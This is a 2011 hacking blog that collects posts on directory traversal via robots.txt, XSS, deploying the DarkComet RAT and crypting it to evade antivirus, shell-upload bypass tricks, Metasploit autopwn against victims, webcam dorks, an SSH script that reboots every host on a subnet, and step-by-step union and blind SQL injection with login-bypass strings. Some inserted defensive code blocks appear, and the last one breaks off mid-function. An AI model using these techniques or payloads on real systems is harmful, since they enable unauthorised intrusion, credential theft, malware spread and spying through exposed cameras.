Tuesday, November 8, 2011

Directory traversal using ROBOTS.txt

Hi Friends, first of all let me tell you what Directory Traversal is.
Directory Traversal allows you to change which directory you are located in by editing the path in the URL bar. On an insecure web page this lets you reach pages you normally can't.
Now, what is robots.txt?

"Web site owners use the /robots.txt file to give instructions about their site to web robots; this is called The Robots Exclusion Protocol."
It works like this: a robot wants to visit a Web site URL, say http://www.example.com/welcome.html. Before it does so, it first checks for http://www.example.com/robots.txt, and finds:

User-agent: *
Disallow: /

The "User-agent: *" means this section applies to all robots. The "Disallow: /" tells the robot that it should not visit any pages on the site.
==> Now the next step is finding the disallowed pages

This is quite simple. Go to the main page and type in:

http://www.[hostname].ext/robots.txt

In this textfile, you will see something that looks like this:

User-agent: *

Allow: /searchhistory/

Disallow: /news?output=xhtml&

Allow: /news?output=xhtml

Disallow: /search

Disallow: /groups

Disallow: /images

Disallow: /catalogs


>> User-Agent can be something other than *, which means all robots. It can also name a particular browser or robot, and then the rule applies only to that user agent.

Now our last step is to access the pages. We can already browse the directories that are allowed, but what about those which are disallowed? Here is a trick that may help you get into a restricted directory:


Type a directory that comes after a Disallow: line.

Chances are, you will get denied.

To get access you could see if you can modify your cookie, but that's not what I'm talking about here.

Now type in the same directory as before, but add /Anyrandomletters&symbols

It should look like this:

[host]/disalloweddirectory/Anyrandomletters&symbols

This will give you a "not found" error. Good.

Now for the Directory Traversal part:

[host]/disalloweddirectory/anyrandomletters&symbols/../

You should have noticed the /../. That is the Directory Traversal part.

What this does is send you back one directory, and if the website is insecure, you can get access to the Disallowed area.

This doesn't work on most popular sites, but it works on privately owned sites which are not properly coded.
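As an added illustration (not code from this blog), here is what makes a site "properly coded" against the trick above: the server must canonicalize the request path (percent-decode it and collapse the /../ segments) before it decides whether the directory is restricted. The restricted directory list is constructed for the example; robots.txt itself is only advice to crawlers and never enforces anything.

```python
import posixpath
from urllib.parse import unquote

# Constructed example: directories the site wants kept private. In the post
# these come from robots.txt, which is advice to crawlers, not access control,
# so the web application has to enforce them itself.
RESTRICTED_DIRS = ("/search/", "/groups/", "/images/", "/catalogs/")


def canonical_path(raw_path):
    """Percent-decode (repeatedly, with a bound) and collapse '.'/'..' segments,
    so that '/images/xyz/../' and '/images/' compare equal."""
    path = raw_path
    for _ in range(3):              # bounded: stops as soon as decoding is stable
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    norm = posixpath.normpath("/" + path.lstrip("/"))
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"                 # normpath drops the trailing slash; keep it
    return norm


def naive_is_restricted(raw_path):
    """The weak check: compare the path exactly as it arrived."""
    return raw_path in RESTRICTED_DIRS


def is_restricted(raw_path):
    """The sound check: canonicalize first, then compare by directory prefix."""
    path = canonical_path(raw_path)
    key = path if path.endswith("/") else path + "/"
    return any(key.startswith(d) for d in RESTRICTED_DIRS)


if __name__ == "__main__":
    for req in ("/images/", "/images/abc123/../", "/images/%2e%2e/../", "/public/page.html"):
        print(req, "naive:", naive_is_restricted(req), "canonical:", is_restricted(req))
```

The naive check answers "no" for /images/abc123/../ because the raw string is not in its list, while the file system later resolves that same path to /images/; the canonical check answers "yes" for both spellings, so there is nothing left for the /../ to bypass.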
Thanks :-) Enjoy hacking :-)

Thursday, November 3, 2011

XSS Attack (Cross Site Scripting)

Hello Friends, today I am sharing the most common vulnerability, which is found in most websites because of poor coding. First of all let me tell you what XSS is.
WHAT IS XSS: reference wikipedia -
"Cross-zone scripting is a browser exploit taking advantage of a vulnerability within a zone-based security solution. The attack allows content (scripts) in unprivileged zones to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:

* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.

* a web browser configuration error; unsafe sites listed in privileged zones.

* a cross-site scripting vulnerability within a privileged zone

A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.

This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page."

The second step is to code an XSS vulnerable page, so here we go:

Open Notepad and copy the content from the links given below.
Save this page as index.html => http://pastebin.com/Y6pN08pv

Save this page as XSS.php => http://pastebin.com/L0E4bJKc
Open index.html in Firefox.
Enter a value and search; return to the search page and enter a value again.
Send the form.


The above was just a simple "non persistent XSS". However, an XSS attack can lead to serious problems such as cookie stealing, privacy disclosure, defacing, etc. You can code a cookie grabber and then redirect your victim to that script. Persistent XSS allows the attacker to change the content of the site, i.e. its data, so the website will look normal; since all the links appear to come from the owner of the site, the victims will easily trust them and may follow the evil link :P

Now the next step is to secure against XSS:

Simply use the htmlspecialchars() function in PHP, or the other function, htmlentities() :-)
code ==> http://pastebin.com/Cc4quJVB
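An added example, not from this post or its pastebin links: the reflected search page from the walkthrough, rendered with and without output encoding. Python's html.escape() is used as the counterpart of PHP's htmlspecialchars() with ENT_QUOTES; the probe string is constructed.

```python
import html

# Constructed probe: what a user might type into the search box of the
# post's index.html. It is a test string, not the pastebin code.
PROBE = "<script>alert(1)</script>"


def render_results_unsafe(term):
    """Reflects the term as-is into the page: the non-persistent XSS case."""
    return "<p>Results for: " + term + "</p>"


def render_results(term):
    """Encodes &, <, >, double and single quotes before the term reaches the
    page, the same five characters htmlspecialchars() handles with ENT_QUOTES."""
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


def render_search_box(term):
    """Attribute context: the value must be both quoted and encoded, or a
    double quote in the input would end the attribute early."""
    return '<input name="q" value="' + html.escape(term, quote=True) + '">'


if __name__ == "__main__":
    print(render_results_unsafe(PROBE))     # the tag survives: the browser runs it
    print(render_results(PROBE))            # &lt;script&gt;...: shown as text
    print(render_search_box('" onfocus="x'))
```

The encoding has to happen at output time and per context (text node, attribute value, URL, script); encoding on input, or only for the text-node case, is how filters end up "bypassable" as the next post promises to show.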

In the next post I'll write about how to bypass filters to get XSS on a site and will share many more tricks that can be played on an XSS vulnerable site ;-)
Happy hacking at your own risk :)

Monday, October 10, 2011

Earn money online

Hey friends, this is just a post apart from hacking. Those who want to make some money online, please register yourself and start earning. It's easy and real.

Sunday, July 3, 2011

Hack a PC Using RAT(Remote administration tool)

Hello Friends... Sorry I am writing after a long time because I was busy with some stuff. Today I will tell you how to hack a PC using DARK COMET RAT. This tutorial is very easy to start...

First go to http://www.no-ip.com/ and create an account. Then:

: Choose your host name.
: Enter your IP address.
: Create host.

As shown in the pic below:

No-IP is set; now let's download the DUC to update your IP automatically!
DUC download : http://www.no-ip.com/downloads.php
Start the DUC client after installation.

Now to download DarkComet, you can visit http://www.darkcomet-rat.com/ for some info and the download.
After installation, open the DarkComet client. If you don't want to use the DUC client for No-IP you can do it with DarkComet. Here is how to do it:

Now let's build the server: go to Edit Server => Server Module.

Press Generate a few times

1 : Enter your no-ip host name
2 : Choose your port
3 : Test Network
4 : Add this to your configuration
5 : Click your host to set it.


Make sure your port is open! You can check it here: http://canyouseeme.org/
The next step you can choose yourself, but this is what I use; if you don't know what to do just copy the settings.

Again, if you want key logs then:
Now it's time to build your server!
Note: after building you need to crypt your server to get it FUD for spreading!

Now to see your vics, press +listen, set your port and press listen!

And you are done... wooo000hhH
This was all about the use of a RAT, but you need to crypt your server to make it undetectable by antivirus. So have fun and enjoy hacking at your own risk... good luck.

Friday, April 8, 2011

Uploading a SHELL

Hello friends!!!
I have not written this article myself, but I am sharing it because I think it will be helpful to those who upload their shells on a target but it does not execute.
NOTE: I am not responsible for what you do with this information.

How to Upload a Shell

First of all, when uploading a shell, you MUST be able to problem-solve. Some of the techniques I have compiled in this guide aren't exactly easy for most of you.

I am separating this guide into steps, and this won't always work. In fact, most of the time (if the coder was bright at all), these techniques will NOT work. So don't go posting about it not working for you on one site.

First though, you need some form of upload script. I don't care if it's a public upload script or one off an admin page.

Step 1
First off, try the shell with the regular php extension. I've seen this work for admin panels a lot of the time, because the coder doesn't think anyone but the site admin will be messing with it; he doesn't stop to think about security.

Step 2
If step 1 doesn't work, you're going to have to try different extensions that also execute php on most servers. These would include .php2, .php3, .php4, .php5, .phtml, .htm (rare cases), .html (rare cases), and no extension at all (rare cases). Also, you can attempt using a null byte to make it work.

Examples:

Code:
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;

Step 3
Now on to step 3; it seems that step 2 didn't work for you. Sometimes (now this is occasional), the file extensions it will accept are in the source of the page itself; this is most common for Java uploaders and similar. So to check for this, view the source of the page and check it for anything that looks like file extensions. If you do find any, use a tool like Firebug (an add-on for Firefox) to edit the source to include the extension "php".

Step 4
Next, maybe the script is just blocking the .php, .php2, .php3, etc. scripts from being uploaded. The best way to counteract this is to upload a .htaccess file. Go into Notepad or whatever and paste this in:
Code:
AddType application/x-httpd-php .shell .other .jpg .gif .png .mov .pdf
Then upload the shell with one of those extensions. It should execute as php even with the weird extension.

Step 5
Last but not least is the header modification trick. This one is a little complicated (will add pics in a minute). To do this, you need something like the Tamper Data add-on for Firefox. In this example, I'll use that add-on. What you want to do is, after you attempt to send the post data, tamper with the data before it sends. Then scroll through the raw data until you find the header data. Let's say our header is Application/Data; you would want to change that to something appropriate to the script's intended purpose, like Image/Jpeg for an image upload script.
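Added example, not part of the guide: the server-side validation that closes every step above. It uses a fixed allow-list, refuses names with more than one extension or with odd characters (steps 1 and 2), refuses dotfiles so a .htaccess can never land (step 4), checks the file's leading bytes instead of the client's Content-Type header (step 5), and stores the file under a name the server chooses. Python; the allow-list and magic-byte table are my assumptions for an image uploader.

```python
import os
import re
import secrets

# Assumed policy for an image uploader (my choice for this example, not the
# guide's): the accepted extensions and the leading bytes of each format.
ALLOWED = {
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png":  b"\x89PNG\r\n\x1a\n",
    "gif":  b"GIF8",
}
STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")   # rejects % ; : NUL and spaces


def check_upload(filename, content):
    """Return (accepted, reason). Every check must pass, and the browser's
    Content-Type header is never consulted: it is attacker-controlled."""
    if os.path.basename(filename) != filename:
        return False, "directory components in name"
    if filename.startswith("."):
        return False, "dotfile such as .htaccess"            # closes step 4
    parts = filename.split(".")
    if len(parts) != 2:
        return False, "expected exactly one extension"       # closes shell.php.jpg
    stem, ext = parts
    if not STEM.match(stem):
        return False, "unexpected characters in name"        # closes %, ;, : tricks
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension not in allow-list"          # closes .php, .phtml, ...
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not look like " + ext    # closes PHP inside a .jpg
    return True, "ok"


def stored_name(ext):
    """Server-chosen file name; the client's name is never used on disk.
    Keep the directory outside the web root and serve files via a handler."""
    return secrets.token_hex(16) + "." + ext.lower()


if __name__ == "__main__":
    # Constructed inputs: a real-looking JPEG header and a PHP payload stub.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    for name, body in (("photo.jpg", jpeg), ("photo.jpg", b"<?php"),
                       ("shell.php.jpg", jpeg), (".htaccess", b"AddType")):
        print(name, check_upload(name, body))
```

The last check matters even with a strict allow-list: a .jpg whose content is PHP is harmless only as long as nothing (such as an uploaded .htaccess or a mis-set handler) teaches the server to execute it, so reject the mismatch up front.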

That concludes the guide on how to upload a shell for now; will add more to it later. Enjoy!
Happy hacking :))

Tuesday, April 5, 2011

Hacking a computer with metasploit

Hello friends, today I am sharing how to use Metasploit to exploit a remote computer.
Here we go:
NOTE: I am not responsible for what you do with this information.
Download the latest Metasploit framework from its official site - www.metasploit.com
Okay, once you have downloaded it, install it; during installation it'll ask you if you want to install Nmap also. Say YES.

Nmap is software which allows you to check the open ports, OS, services, etc. of a remote computer just from its IP.

Now launch msfconsole.

It'll take some time as it has more than 600 exploits and 200 payloads.

Type = db_driver sqlite3

=>> It'll enable the database driver.

Now type = db_create

=>> It'll create a database.

Type = nmap

=>> It'll load the Nmap up.

Now type = db_nmap -sT -sV [victim's ip address]

=>> It'll show the open ports of victim's machine.

Now finally type = db_autopwn -p -t -e

=>> Now it'll try different exploits on the remote machine automatically, and if it finds a working exploit, it'll give you a CMD shell on the remote PC!

Now you have full access to that PC; you can do anything with it.
Enjoy hacking

Thursday, March 31, 2011

Watch Hidden Cameras all over the world

Hello everyone, this is not hacking, it's just about whether you know this or not :P. I am sharing this with you because I thought you may love to see through public cameras of different countries :).

Type these dorks into www.google.com and get loads of hidden cameras of various cities, college campuses, roads and even sea beaches from all around the world.

Dorks :
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera NetworkCamera"
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:indexFrame.shtml Axis
inurl:"MultiCameraFrame?Mode=Motion"

enjoy :))

Wednesday, March 2, 2011

playing with SSH (Secure Shell)


Hi guys, here I am writing about one of the most basic and popular methods for remote administration. I will try to provide as much information as I can.
SSH (Secure Shell): It is used to access or log in to a remote machine on the network, using its host name or IP address. It is a secure network data exchange protocol which came up as an enhancement of insecure protocols like telnet, rsh, etc. SSH encrypts the bi-directional data transfer using cryptographic algorithms, so it is protected from data theft and sniffing.

Here we go with the basic functions of the SSH protocol:
> Compression
> Public Key Authentication
> Port Forwarding
> Tunneling
> X11 Forwarding
> File Transfer

It seems to be a complete package for remote administration.
To install the SSH package on Linux based systems, here I am writing the commands for some distros
1> Debian:
# apt-get install openssh-server
# apt-get install openssh-client

2> Ubuntu
$ sudo apt-get install openssh-server
$ sudo apt-get install openssh-client

3> RHEL
# rpm -ivh openssh-server
# rpm -ivh openssh-client

4> Fedora
# yum install openssh-server
# yum install openssh-client

Now I guess you can install both packages on your machine by issuing the respective installation command. Windows does not support SSH by default, so we need to use a third-party agent like PuTTY, "SSH Tunnel Easy" or any other software. Now let's proceed to see the working of the SSH protocol. :)


>>> Basic Operations:
1> Remote login
root@sanju]# ssh user@hostname      /* we can give the IP address of the server in place of hostname */
          OR
root@sanju]# ssh hostname   (this command is equal to ]# ssh root@hostname, because we are trying to log in from root of our machine to root of the remote machine)

It is possible you may not get a connection even though the ssh daemon is running on the remote machine, because the system admin has configured the SSH daemon to listen on a non-standard port such as 459 instead of 22. In this case you can connect via the desired port, i.e.

root@sanju~]# ssh  -p  459 hostname
        
After all the above commands you will be prompted for a password, and with proper credentials you can access the remote machine.

>>> Executing remote commands
Now let's have some fun:

root@sanju~]# ssh remote-ip 'command'
e.g.
root@sanju~]# ssh hostname 'uname -a'   (shows the kernel version and information about the OS)

You can also fire this command at a host >>> root@sanju~]# ssh user@hostname 'reboot'   :P
>>> Input/Output redirection
First let's have a look at these commands

echo "hackersgallery" > demofile
cat < demofile   (equivalent to "cat demofile")

I guess you can easily get what the above commands are doing. In the first command the string "hackersgallery" is redirected into a file named "demofile". In the second command the file "demofile" is fed as input to the "cat" command.
Now move further:
echo hello | command1 | command2
here "|" is the pipe operator. It uses the output of one command as input to the next command. We can chain any number of pipes, e.g.

root@sanju]# echo "hackersgallery" | tr -d 'l'
output will be > hackersgaery

You can try some more combinations of operators to get interesting results:

root@sanju]# ssh  user@remotehost  'cat   /etc/passwd | grep root' 

The SSH protocol also supports data transfer with compression
root@sanju~]# ssh -C user@remotehost


>>> File Transfer
Two data transfer utilities that will help you are SCP and SFTP. SCP stands for secure copy; we can use it to copy data from the local machine to a remote machine, from a remote machine to the local machine, or from one remote machine to another.
>> local machine to remote machine
scp local_file_path user@remotehost:destination_file_path

>> remote machine to local machine
scp user@remotehost:remote_file_path local_destination_file_path

>> remote machine to remote machine
scp user1@remotehost1:remote_file_path user2@remotehost2:destination_file_path

We can even use wildcards to select files if we don't know the exact name of the file we want to get

scp user@remotehost:/home/*.txt /home/sanju/
SFTP stands for secure file transfer protocol. It is a secure implementation of the traditional FTP protocol. We can issue a command as

sftp user@remotehost   (after entering the password we'll get the sftp prompt)
sftp>

Some of the commands that are available under sftp are:
> cd  - change directory on the remote machine
> ls  - list the remote directory content
> lcd - change directory on the local machine
> lls - list the local directory content
> put - send or upload files to the remote machine from the current working directory of the local machine
> get - receive or download files from the remote machine to the current working directory of the local machine


RUNNING X-WINDOWS REMOTELY

To enable X11 Forwarding , edit ssh_config file
root@sanju~]# vi    /etc/ssh/ssh_config
ForwardX11   yes

save and exit

Now to launch GUI apps remotely, execute the ssh command with the -X option, e.g.
root@sanju~]# ssh  -X  root@remotehost   'vlc'


PORT FORWARDING

One of the important uses of SSH is port forwarding; SSH allows you to forward ports from client to server and from server to client. There are two types of port forwarding, Local and Remote. In local port forwarding, ports on the client are forwarded to server ports, so the locally forwarded port acts as a proxy for the port on the remote machine.

Local port forwarding
root@sanju~]# ssh -L local_port:remote_host:remote_port user@sshserver      e.g.

ssh -L 2020:remotehost:22 remotehost
here it forwards local port 2020 to remotehost's SSH port 22, thus we can use
ssh localhost -p 2020       instead of    "ssh remotehost"

In remote port forwarding, ports on the server are forwarded to a client port, so ports on the remote host act as a proxy for ports on the local machine.
What is the use of remote forwarding?
Suppose you have a local machine that lies inside an internal network connected to the Internet through a router or gateway. If we want to access the local machine from outside the network, it is impossible to access it directly, but by forwarding the local port to a remote host we can access the local machine through a port of the remote host.
so our command will be
ssh -R remote_port:localhost:local_port user@remotehost   e.g.

ssh -R 2020:localhost:22 remotehost.com
To SSH to the local machine from outside the internal network, we can make use of "remotehost.com" as
ssh -p 2020 remotehost.com

SOCKS4 Proxy

SSH has an interesting feature called dynamic port forwarding, with which the SSH TCP connection works as a SOCKS4 proxy. By connecting to the given port, it handles SOCKS data transfer requests.
What is the use of dynamic port forwarding?
Let's suppose you have a machine on a network that is connected to the internet and another machine on the same network that does not have any internet connection. By using SSH dynamic port forwarding you can easily access the internet by setting up the machine with the internet connection to act as a SOCKS4 proxy over an SSH tunnel.
For dynamic port forwarding use the following command:
ssh -D 3000 remotehost

now in your browser specify the proxy settings as:
SOCKS4
host : localhost
port : 3000
to send DNS lookups through the proxy in Firefox, navigate to the about:config page and set
network.proxy.socks_remote_dns = true

There are many more things about SSH still to be learned. Finally, let us write a small shell script to reboot all the switched-on machines in the network.

#!/bin/bash
base_ip="192.168.0."

# ${base_ip} must be braced: brace expansion runs before variable expansion,
# so $base_ip{1..255} would expand to the empty variables $base_ip1, $base_ip2, ...
for machine in ${base_ip}{1..255}
do
   ping -c2 "$machine" &> /dev/null
   if [ $? -eq 0 ]
   then
      ssh "$machine" reboot
   fi
done

<<==================================================>>
regards
sanjeev

Wednesday, February 16, 2011

SQL INJECTION IN DETAIL (Cont.)


Hello, I am back with the good news that I got a job :) Let's continue with my previous article about SQL Injection.
Here I am explaining blind SQLi. It's a time-taking injection because you have to guess many things, which means you should have good guessing power as well as luck :).


BLIND SQL INJECTION :-
I think here I need to write the definition of blind injection, so I am copying it from Wikipedia. Here is the definition: http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection

Testing IF the target is vulnerable to MySQL blind injection:
=> http://targetsite.com/news.php?id=5 and 1=1
^ as this is always true, the page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is false :P, so if some text, picture or other content is missing on the returned page then that site is vulnerable to blind SQL injection.

Getting the MySQL version in blind SQLi: to get the version in a blind attack we use substring, i.e.
=> http://targetsite.com/news.php?id=5 and substring(@@version,1,1)=4
^ this should return TRUE if the version of MySQL is 4 (replace 4 with 5, and if the query returns TRUE then the version is 5).
Now test if a subselect works (when select doesn't work we use a subselect)
i.e.
=> http://targetsite.com/news.php?id=5 and (select 1)=1
^ if the page loads normally then subselects work.
Now, let's see if we have access to => mysql.user
=> http://targetsite.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if the page loads normally we have access to mysql.user, and later we can fetch some passwords using the load_file() function and OUTFILE.

Check table and column names:
# The guessing work starts, that is,
=> http://targetsite.com/news.php?id=5 and (select 1 from users limit 0,1)=1
^ (with limit 0,1 our query returns 1 row of data, because a subselect may return only 1 row; this is very important). If the page loads normally without content missing, the table users exists. If you get FALSE (or some content missing), just change the table name until you guess the right one :). Let's say that I have found that the table name is users; now what we need is the column name !! :D
# The same as for the table name, we start guessing.
=> http://targetsite.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
# if the page loads normally we know that the column name is password (if we get false then try common names or just guess)
here we concatenate 1 with the column password, then substring returns the first character (,1,1)

Fetch data from the database:
I found the table users with columns username and password, so I'm going to pull characters from that.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok, this fetches the first character of the first user in table users.
substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value
and then we compare it with the greater-than symbol ">". So if the ASCII value is greater than 80, the page loads normally: TRUE

>> keep trying until you get false.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, increment
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
got FALSE!!!
So the first character of the username is char(99). Using an ASCII table we know that char(99) is the letter 'c'.

=>> then let's check the second character.
# http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
# Note that I've changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
TRUE, the page loads normally, go higher.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
# FALSE, lower the number.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
# TRUE, increment.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
# FALSE!!!
# we know that the second character is char(105), which is 'i'. We have 'ci' so far
# so keep incrementing until you get to the end (when >0 returns false we know that we have reached the end and have got the data we wanted from the table).

I know that this injection is really boring and tough. So try hacking at least one site using this method; otherwise there are many tools which help you with blind SQLi, and you can use them too.

Wait for my next article :)
sanjeev
Tuesday, February 8, 2011

SQL INJECTION IN DETAIL


Today I am posting this article after so many days because I was busy with placement-like stuff.
Hello guys, my last post was on "prevention against SQLI", so I decided to write about the SQL Injection attack :P. Here I will explain everything briefly, but make sure that you won't use this information for wrong things, as I don't take any responsibility for what you guys do with this information; it's all up to you :)
So let's start. Today I will explain to you about
1 STRING INJECTION: to bypass login form authentication.
2 UNION SELECT
3 BLIND SQLI
4 ERROR BASED SQL INJECTION   /* in MSSQL; I have not tried this one but will post about it also */

1. So let's start with the first one. This is so simple that anyone can try his/her hand at bypassing login form security using this method. In this method you first have to search for the admin login page of the site you want to hack. You can find it using your intelligence or using some freely available tools. Now after getting the login page, all you have to do is just enter the administrator's username and password and you are done.
Let's move on to the second method..... hahahaha...... don't get angry... we still have a task to do after getting the login page, because we don't have the admin's username and password.
Now if you are lucky enough then your target may be vulnerable to this attack. All you have to do is write the following information in the form

USERNAME: admin, administrator, master, manager, targetsite_admin, %admin%, or you can try some general username; in most cases these will work, depending on your luck :P
PASSWORD: In the password field use any of these strings.
' or 1=1-- 

" or 1=1-- 

or 1=1--

1'or'1'='1

' or 'a'='a

" or "a"="a

') or ('a'='a

") or ("a"="a
Finally you are done. If your target is vulnerable you will get access for sure.

2. Union method: Now let's move towards some real work. In this you have to do everything manually, using your mind and skills. Let's start the job
>>> >>> >>>
Let's start with the union attack:
Our aim is to find the TABLE NAME, the COLUMN NAME and then the username and password

=> http://targetsite.com/index.php?id=1 order by 10--
^ This gives me an error
keep trying
=> http://targetsite.com/index.php?id=1 order by 7--
^ again an error, arggg!!!! I hate it
keep trying
=> http://targetsite.com/index.php?id=1 order by 5--
the page is loading normally......... woooooohh
It means the number of columns = 5
Now the next part:
using the union select statement.
=> http://targetsite.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't give you anything, change the first part of the query to a negative value.
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on your screen. Let's say it is 2. Now we know that column 2 will echo data back to us. :D

Now getting the MySQL version
=> http://targetsite.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you don't get it with this, try this:
=> http://targetsite.com/index.php?id=-1 union select 1,version(),3,4,5--
Now you will get the version number
it can be
==> 5+ /* version 5 or above */
==> <5 /* version below 5 */

Now extracting tables for version 5+:
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--

It'll show a lot of tables; if you want to get admin privileges in order to hack the site then you are looking for the "admin" table.
Now I have the table names and I need to extract the column names from them, so the query will be

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--

This will show you the column names inside the table admin. If it gives you an error you need to change the text value admin to MySQL CHAR() form. Use Hackbar, a Firefox add-on, to do so, OR use any other tool, OR write it yourself if you know the ASCII value of every character.
so the char form of admin is => CHAR(97, 100, 109, 105, 110)
therefore the query will be

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

It will show you many tables, but we only need the admin table and the password table

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
/* where 0x3a is the hex value of : (colon) */

wooooohhh, it's time to party, you got the admin name and password
The password can also be encrypted, so you can use decrypters to decode it.
This was all for MySQL 5+
=============================================================
=============================================================
Let's start with MySQL versions below 5:
Version 4, or anything below 5, does not contain ==> information_schema
This method is all about guessing :p
We know the number of columns, that is 5.
=> Let's start guessing the table:
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from users--
^ got an error... give it one more try
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--
^ Suppose this does not give me an error; it means it worked and we got the table name

==> The next part is guessing the columns:
as we did earlier, we found the vulnerable column is 2... so let's proceed further.
=> http://targetsite.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--
^ got an error. shit!!!!!!
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--
^ no error..... yes, I got the column name

==> let's guess the password column now

=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--
^ got an error, one more try
=> http://targetsite.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--

We did it, we got the password column successfully, so cheers

This is the end of the union method for MySQL; you can try the same for MSSQL. Wait for my next post, I will post about blind injection and error based injection both :)
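Added example, not part of either SQL injection post: the request patterns walked through above (order by column counting, union select, information_schema lookups) and in the blind SQLi post (and 1=1 / and 1=2, ascii(substring(...)) character probing) are easy to spot in a web server's access log, which is where a site owner would first notice this activity. Python; the log lines, IPs and timestamps are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qsl, unquote_plus

# Constructed access-log lines (common log format). IPs, timestamps, paths and
# sizes are made up; the query strings mirror the posts' request shapes.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Feb/2011:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
10.0.0.9 - - [08/Feb/2011:10:00:02 +0000] "GET /index.php?id=1%20order%20by%2010-- HTTP/1.1" 500 312
10.0.0.9 - - [08/Feb/2011:10:00:03 +0000] "GET /index.php?id=-1%20union%20all%20select%201,2,3,4,5-- HTTP/1.1" 200 4870
10.0.0.9 - - [08/Feb/2011:10:00:04 +0000] "GET /index.php?id=-1%20union%20all%20select%201,group_concat(table_name),3,4,5%20from%20information_schema.tables-- HTTP/1.1" 200 6011
10.0.0.7 - - [08/Feb/2011:10:00:05 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 5120
10.0.0.7 - - [08/Feb/2011:10:00:06 +0000] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200 4311
10.0.0.7 - - [08/Feb/2011:10:00:07 +0000] "GET /news.php?id=5%20and%20ascii(substring((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 5120
10.0.0.5 - - [08/Feb/2011:10:00:08 +0000] "GET /news.php?id=7 HTTP/1.1" 200 5002
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \d+$'
)

# Each rule is named after the technique it corresponds to in the posts.
RULES = [
    ("union-based", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("schema enumeration", re.compile(r"information_schema|@@version|version\(\)", re.I)),
    ("boolean blind", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("char-by-char blind", re.compile(r"ascii\s*\(\s*substring\s*\(", re.I)),
]


def decode_params(target):
    """Parameter values of a request target, decoded twice so that a
    double-encoded payload is inspected in its final form."""
    query = urlparse(target).query
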